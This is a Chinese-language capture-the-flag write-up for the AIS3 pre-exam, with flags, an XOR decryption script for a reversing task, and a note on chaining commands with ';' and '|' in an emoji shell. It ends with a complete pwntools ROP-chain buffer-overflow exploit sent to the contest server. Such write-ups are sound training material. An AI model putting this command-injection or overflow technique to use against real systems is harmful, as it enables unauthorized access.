AIS3 Pre-exam Write up

# MISC ## Welcome ![圖片](https://hackmd.io/_uploads/SkkrwlSN0.png) ## Quantum Nim Heist 經典數學遊戲Nim 最後剩兩顆石頭時按3(亂按就成功了) ![圖片](https://hackmd.io/_uploads/B15SwgBEA.png) 拿到flag **Flag=AIS3{Ar3_y0u_a_N1m_ma57er_0r_a_Crypt0_ma57er?}** ## Emoji Console 看起來是一個shell 我先測試了🐱⭐ ![圖片](https://hackmd.io/_uploads/ByfLweHVA.png) 找到了flag的目錄接著用💿 🚩成功切換到flag目錄，接下來使用;可以在一行內輸入多個指令再用|去分隔指令，使用💿 🚩 😓😐 🐱 ⭐ 找到了這個檔案， ![圖片](https://hackmd.io/_uploads/HyDIweSN0.png) 執行💿 🚩 😓😐 💿 🚩 😓😐 🐍 ⭐。 ![圖片](https://hackmd.io/_uploads/BkZPPerEA.png) **Flag = AIS3{🫵🪡🉐🤙🤙🤙👉👉🚩👈👈}** ## Three Dimensional Secret wireshark分析因應題目追查tcp流量 ![圖片](https://hackmd.io/_uploads/SJQoveSNR.png) 找到一坨Gcode ![圖片](https://hackmd.io/_uploads/B1ZuPeH40.png) **FLAG = AIS3{b4dly_tun3d_PriN73r}** # Reverse ## The Long Print 直接丟IDA分析 ![圖片](https://hackmd.io/_uploads/BkLCwlHNC.png) Flag為secret xor key。丟gdb找陣列 ![圖片](https://hackmd.io/_uploads/rksAvlr4C.png) 位址為0x555555556020 ![圖片](https://hackmd.io/_uploads/HJyyOerNC.png) **Exploit** ``` secret = [0x454b4146, 0x0000000b, 0x6f6f687b, 0x0000000a, 0x5f796172, 0x00000002, 0x69727473, 0x00000008, 0x5f73676e, 0x00000006, 0x615f7369, 0x00000005, 0x7961776c, 0x00000007, 0x6e615f73, 0x00000004, 0x6573755f, 0x00000009, 0x5f6c7566, 0x00000000, 0x6d6d6f63, 0x00000001, 0x7d7a6e61, 0x00000003] key = [0x3a011001, 0x4c4c1b0d, 0x3a0b002d, 0x00454f40, 0x3104321a, 0x3e2d161d, 0x2c120a31, 0x0d3e1103, 0x0c1a002c, 0x041d1432, 0x1a003100, 0x76180807, 0x65706f48, 0x756f7920, 0x76616820, 0x6e652065] decrypted_message = '' for i in range(0, len(secret), 2): # 將 secret 中的 4 個字節進行 XOR 解密 v4 = secret[i] ^ key[secret[i + 1]] # 將解密後的結果轉換為 ASCII 字符 decrypted_message += chr(v4 & 0xFF) decrypted_message += chr((v4 >> 8) & 0xFF) decrypted_message += chr((v4 >> 16) & 0xFF) decrypted_message += chr((v4 >> 24) & 0xFF) print("Decrypted:", decrypted_message) ``` # PWN ## Mathter 先連上去看看看起來沒有什麼問題丟IDA分析 ![圖片](https://hackmd.io/_uploads/HkteOlSEA.png) 關鍵點fgets 且只有離開時才不會檢查輸入且在函式中看到了 ![圖片](https://hackmd.io/_uploads/S1gMderNA.png) 猜測為ROP chain題接著檢查保護 ![圖片](https://hackmd.io/_uploads/HJSXdgBVR.png) 確定為ROP chain **Exploit** ``` from pwn import * host = "chals1.ais3.org" port = 50001 #AIS3{0mg_k4zm4_mu57_k4zm4_mu57_b3_k1dd1ng_m3_2e89c9} context.arch = 'amd64' context.terminal = ["tmux", "splitw", "-h"] offset = 12 win1_addr = 0x4018c5 arg = 0xDEADBEEF win2_addr=0x401997 _arg=0xCAFEBABE elf = ELF('./mathter') rop = ROP(elf) pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0] payload = b'a' * offset payload += p64(pop_rdi) payload += p64(_arg) payload += p64(win2_addr) r = remote(host, port) r.sendlineafter(b"Enter an operation and two numbers (e.g., 1 + 1) : ", b'q') r.sendlineafter(b"Are you sure you want to leave? [Y/n]", payload) print(r.recvall()) ```